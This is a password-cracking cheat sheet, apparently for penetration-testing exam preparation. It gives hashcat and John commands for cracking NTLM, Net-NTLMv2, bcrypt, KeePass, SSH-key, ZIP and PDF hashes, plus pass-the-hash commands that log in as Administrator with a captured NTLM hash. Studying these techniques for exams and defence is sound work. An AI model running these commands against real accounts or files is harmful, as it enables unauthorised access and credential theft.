Password Cracking

Focused on real-world cracking during exams.

Cracking MD5 / SHA1 Hashes

Use rockyou.txt and check if the password is in the default wordlist.

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force

Rule-Based Attack with Hashcat

Mutate wordlist entries to match password policies (digits, caps, symbols).

hashcat -m 0 hash.txt rockyou.txt -r demo.rule --force

Writing demo.rule (for Hashcat Rule-Based Attacks)

You want to mutate existing passwords to match common policies (e.g., capital letter, number, symbol).

# sample demo.rule Content
c        # Capitalize first letter (e.g., password → Password)
$1       # Append 1 (e.g., Password → Password1)
$!       # Append ! (e.g., Password1 → Password1!)
^@       # Prepend @ (e.g., @Password1!)

# create it:
echo -e "c\n$1\n$!\n^@" > demo.rule

# Use it
hashcat -m 0 hash.txt wordlist.txt -r demo.rule --force

# You can chain multiple rules on one line to apply them together:
c$1$!     # Capitalize, append 1, then append !

Brute-Force Attack

Try all alphanumeric combinations of a given length.

hashcat -m 0 hash.txt -a 3 ?a?a?a?a?a --force

Crack KeePass `.kdbx` Database

Extract hash using keepass2john and crack with hashcat.

keepass2john db.kdbx > keepass.hash
hashcat -m 13400 keepass.hash rockyou.txt --force

Crack SSH Private Key Passphrase

Convert with ssh2john and crack with John or Hashcat (if supported).

ssh2john id_rsa > ssh.hash
john --wordlist=ssh.passwords --rules=sshRules ssh.hash

Crack NTLM Hashes

Mode -m 1000 for NTLM hashes.

hashcat -m 1000 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Crack Net-NTLMv2 Hashes

Captured via responder or relays; use mode -m 5600.

hashcat -m 5600 ntlmv2.hash wordlist.txt --force

Crack bcrypt (mode 3200)

Used in some CMS platforms or modern Linux user hashes.

hashcat -m 3200 bcrypt.hash rockyou.txt --force

Crack ZIP File Passwords

Convert ZIP to hash using zip2john and crack it.

zip2john secret.zip > zip.hash
hashcat -m 13600 zip.hash rockyou.txt --force

Crack PDF File Passwords

Convert PDF to hash using pdf2john and crack with hashcat.

pdf2john.py secret.pdf > pdf.hash
hashcat -m 10500 pdf.hash rockyou.txt --force

Pass-the-Hash (NTLM SMB / WinRM)

Use valid hash to authenticate without cracking.

smbclient \\target\share -U Administrator --pw-nt-hash <NTLM_HASH>

impacket-psexec -hashes :<NTLM_HASH> Administrator@target-ip

PreviousLigolo-ng

Last updated 2 days ago

Was this helpful?

# sample demo.rule Content c # Capitalize first letter (e.g., password → Password) $1 # Append 1 (e.g., Password → Password1) $! # Append ! (e.g., Password1 → Password1!) ^@ # Prepend @ (e.g., @Password1!) # create it: echo -e "c\n$1\n$!\n^@" > demo.rule # Use it hashcat -m 0 hash.txt wordlist.txt -r demo.rule --force # You can chain multiple rules on one line to apply them together: c$1$! # Capitalize, append 1, then append !

Cracking MD5 / SHA1 Hashes

Rule-Based Attack with Hashcat

Brute-Force Attack

Crack KeePass .kdbx Database

Crack SSH Private Key Passphrase

Crack NTLM Hashes

Crack Net-NTLMv2 Hashes

Crack bcrypt (mode 3200)

Crack ZIP File Passwords

Crack PDF File Passwords

Pass-the-Hash (NTLM SMB / WinRM)

Cracking MD5 / SHA1 Hashes

Rule-Based Attack with Hashcat

Brute-Force Attack

Crack KeePass .kdbx Database

Crack SSH Private Key Passphrase

Crack NTLM Hashes

Crack Net-NTLMv2 Hashes

Crack bcrypt (mode 3200)

Crack ZIP File Passwords

Crack PDF File Passwords

Pass-the-Hash (NTLM SMB / WinRM)

Crack KeePass `.kdbx` Database

Crack KeePass `.kdbx` Database